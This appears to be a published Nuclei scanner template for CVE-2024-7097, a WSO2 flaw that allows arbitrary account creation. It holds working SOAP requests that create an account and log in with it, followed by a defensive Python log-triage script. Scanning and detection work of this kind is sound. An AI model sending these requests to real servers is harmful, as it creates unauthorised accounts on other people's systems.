WSO2 User Registration - Arbitrary Account Creation

ID: CVE-2024-7097

Severity: medium

Author: iamnoooob,rootxharsh,pdresearch

Tags: cve,cve2024,wso2,intrusive,auth-bypass

The SOAP admin service in WSO2 products has a security vulnerability that allows the creation of new user accounts regardless of the self-registration configuration settings.

```yaml
id: CVE-2024-7097

info:
  name: WSO2 User Registration - Arbitrary Account Creation
  author: iamnoooob,rootxharsh,pdresearch
  severity: medium
  description: |
    The SOAP admin service in WSO2 products has a security vulnerability that allows the creation of new user accounts regardless of the self-registration configuration settings.
  reference:
    - https://sec.vnpt.vn/2025/01/canh-bao-lo-hong-nghiem-trong-tren-nen-tang-xac-thuc-tap-trung-wso2-anh-huong-den-nhieu-co-quan-to-chuc-bo-ban-nganh/
    - https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2024/WSO2-2024-3574/
  metadata:
    verified: true
    max-request: 2
    shodan-query: "WSO2 Carbon Server"
  tags: cve,cve2024,wso2,intrusive,auth-bypass

variables:
  username: "{{randstr_1}}"
  password: "{{randstr_2}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /services/UserRegistrationAdminService.UserRegistrationAdminServiceHttpsSoap11Endpoint/ HTTP/1.1
        Host: {{Hostname}}
        SOAPAction: "urn:addUser"
        Content-Type: text/xml

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
          xmlns:xsd="http://org.apache.axis2/xsd">
          <soapenv:Header/>
          <soapenv:Body>
            <xsd:addUser>
              <xsd:user>
                <xsd:userName>{{username}}</xsd:userName>
                <xsd:password>{{password}}</xsd:password>
              </xsd:user>
            </xsd:addUser>
          </soapenv:Body>
        </soapenv:Envelope>

    matchers:
      - type: status
        status:
          - 202
        internal: true

  - raw:
      - |
        POST /services/AuthenticationAdmin HTTP/1.1
        Host: {{Hostname}}
        SOAPAction: ""
        Content-Type: text/xml

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
          xmlns:aut="http://authentication.services.core.carbon.wso2.org">
          <soapenv:Header/>
          <soapenv:Body>
            <aut:login>
              <aut:username>{{username}}</aut:username>
              <aut:password>{{password}}</aut:password>
            </aut:login>
          </soapenv:Body>
        </soapenv:Envelope>

    matchers:
      - type: word
        words:
          - "loginResponse"
          - "<ns:return>true</ns:return>"
        condition: and
# digest: 4a0a00473045022100a329adb144a01bd414cbf48754c7aec71dbb4db306c5a4f4a544616bab1f414402201aae5ae006320958b435bd6f02e62eb5bc3ecc3881411b2c6a9817fd0d5ed10a:922c64590222798bb761d5b6d8e72950
```

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-7097.yaml"
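As an added defender-side example (not part of the template or the Nuclei project), the following Python triages a constructed access log for the two request patterns the template exercises: a 202 from the `UserRegistrationAdminService` addUser endpoint followed by a call to `AuthenticationAdmin` from the same client. The simplified log format (client, method, path, status), the prefix matching on the service paths, and the sample addresses are all assumptions.

```python
import re

# Constructed sample lines in a simplified "client method path status" format.
# Assumption for illustration only; this is not real WSO2 http_access output.
SAMPLE_LOG = """\
10.0.0.5 POST /services/UserRegistrationAdminService.UserRegistrationAdminServiceHttpsSoap11Endpoint/ 202
10.0.0.5 POST /services/AuthenticationAdmin 200
10.0.0.9 GET /carbon/admin/login.jsp 200
10.0.0.7 POST /services/UserRegistrationAdminService.UserRegistrationAdminServiceHttpsSoap11Endpoint/ 403
"""

LINE_RE = re.compile(r"^(?P<client>\S+) (?P<method>[A-Z]+) (?P<path>\S+) (?P<status>\d{3})$")
REGISTRATION_PATH = "/services/UserRegistrationAdminService"  # prefix of the addUser endpoint
LOGIN_PATH = "/services/AuthenticationAdmin"                   # endpoint of the template's 2nd step


def parse_line(line):
    """Return a dict for a well-formed line, or None for anything else."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def find_registration_abuse(log_text):
    """Map each client that touched the registration admin service to a verdict.

    A 202 from the addUser endpoint (the status the template matches on) is
    recorded as 'account_created'; a later 200 from AuthenticationAdmin by the
    same client upgrades it to 'account_created_and_used'. Any other status on
    the registration endpoint is kept as 'registration_attempt' for review.
    """
    findings = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        client = rec["client"]
        if rec["path"].startswith(REGISTRATION_PATH):
            findings[client] = "account_created" if rec["status"] == 202 else "registration_attempt"
        elif (rec["path"].startswith(LOGIN_PATH) and rec["status"] == 200
              and findings.get(client) == "account_created"):
            findings[client] = "account_created_and_used"
    return findings
```

A 200 on `AuthenticationAdmin` only shows the login call was made; whether it succeeded is in the SOAP body (`<ns:return>true</ns:return>`, which the template's second matcher checks), and access logs do not carry that, so confirm against the server's audit log before treating the verdict as a confirmed compromise.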